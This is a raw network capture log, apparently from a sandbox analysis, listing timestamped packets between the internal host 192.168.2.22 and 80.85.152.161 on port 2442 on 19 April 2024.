Apr 19, 2024 16:17:27.505582094 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:27.505635023 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:27.505646944 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:27.505711079 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:27.505748034 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:27.768389940 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:27.768450975 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:27.768534899 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:27.768542051 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:27.768573999 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:27.768610954 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:27.768610954 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:27.768651962 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:27.768688917 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:27.768688917 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:27.983258009 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.031222105 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.031277895 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.031332016 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.031394005 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.031431913 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.031470060 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.031475067 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.031506062 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.031543970 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.031550884 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.031579971 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.031618118 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.031622887 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.031703949 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.031743050 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.031748056 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.031781912 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.031824112 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.247385979 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.247437000 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.247488976 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.295104027 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295165062 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295203924 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295239925 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295272112 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.295279026 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295309067 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.295316935 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295353889 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295357943 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.295391083 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295427084 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295439959 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.295475960 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295511961 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295521975 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.295551062 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295588017 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295599937 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.295624971 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295660973 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295669079 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.295698881 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295734882 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295747042 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.295772076 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295809984 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295815945 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.295847893 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295885086 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295896053 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.295922041 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295958996 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.295964956 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.295999050 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.296049118 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.510130882 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.510195971 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.510237932 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.510266066 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.510277033 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.510324001 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.558458090 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.558496952 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.558537006 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.558553934 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.558662891 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.558700085 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.558706999 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.558737040 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.558773994 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.558784008 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.558809996 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.558846951 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.558881998 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.558883905 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.558921099 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.558926105 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.558959007 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559000969 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559005976 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559042931 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559087038 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559097052 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559134007 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559169054 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559176922 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559207916 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559243917 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559257984 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559281111 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559317112 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559323072 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559353113 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559391022 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559393883 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559427023 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559463978 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559470892 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559501886 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559537888 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559542894 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559575081 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559612989 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559618950 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559649944 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559684992 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559689999 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559721947 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559758902 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559760094 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559794903 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559832096 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559839010 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559869051 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559906006 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559910059 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.559942007 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559978962 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.559987068 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.560017109 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.560053110 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.560084105 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.560089111 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.560132980 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.560143948 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.560179949 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.560216904 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.560225010 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.560255051 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.560292006 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.560309887 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.560328960 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.560375929 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.774477959 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.774535894 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.774575949 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.774584055 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.774614096 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.774652958 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.774655104 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.774691105 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.774729013 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.774730921 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.774769068 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.774811029 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.821235895 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.821573973 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.821614981 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.821619034 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.821655989 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.821696043 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.823260069 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823431015 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823467970 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823471069 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.823508024 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823544025 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823546886 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.823581934 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823621035 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823625088 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.823657990 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823693991 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823694944 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.823730946 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823767900 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823769093 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.823806047 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823843002 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823844910 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.823880911 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823919058 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823924065 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.823956013 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.823996067 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824003935 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824034929 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824070930 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824070930 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824140072 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824177980 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824188948 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824215889 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824251890 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824258089 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824289083 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824327946 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824328899 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824364901 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824400902 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824403048 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824439049 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824475050 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824479103 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824512005 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824548960 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824551105 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824585915 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824623108 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824624062 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824659109 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824696064 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824700117 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824733019 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824769020 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824770927 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824806929 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824841976 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824843884 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824878931 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824914932 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824918985 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.824953079 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.824990988 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.825001001 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.825031996 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.825067997 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.825068951 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.825105906 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.825141907 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.825145960 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.825179100 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.825215101 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.825220108 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.825252056 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.825289011 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.825289011 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.825326920 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.825362921 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.825366974 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.825398922 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.825433969 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:28.825438023 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:28.847819090 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:29.111717939 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:29.111907959 CEST	2442	49182	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:29.111960888 CEST	49182	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:38.870815992 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:39.117047071 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:39.117178917 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:44.124094009 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:44.124181986 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:44.370163918 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:44.370317936 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:44.616421938 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:44.616637945 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:44.676502943 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:44.676563978 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:44.862485886 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:44.862864971 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:44.862929106 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:44.863002062 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:44.922637939 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:44.922792912 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.109138966 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.109206915 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.109396935 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.109396935 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.110795021 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.110879898 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.168885946 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.169171095 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.169214010 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.169298887 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.355216980 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.355361938 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.355458021 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.355532885 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.356137991 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.356210947 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.356812954 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.356877089 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.357856035 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.357917070 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.358223915 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.358292103 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.359271049 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.359342098 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.360301018 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.360368013 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.414988041 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.415137053 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.416188955 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.416922092 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.419589996 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.601396084 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.601579905 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.601809025 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.601887941 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.602027893 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.602103949 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.603158951 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.603235960 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.603842020 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.603920937 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.605179071 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.605253935 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.605940104 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.605998993 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.606627941 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.606703997 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.607266903 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.607330084 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.608072042 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.608149052 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.608764887 CEST	2442	49183	80.85.152.161	192.168.2.22
Apr 19, 2024 16:17:45.608829021 CEST	49183	2442	192.168.2.22	80.85.152.161
Apr 19, 2024 16:17:45.609687090 CEST	2442	49183	80.85.152.161	192.168.2.22
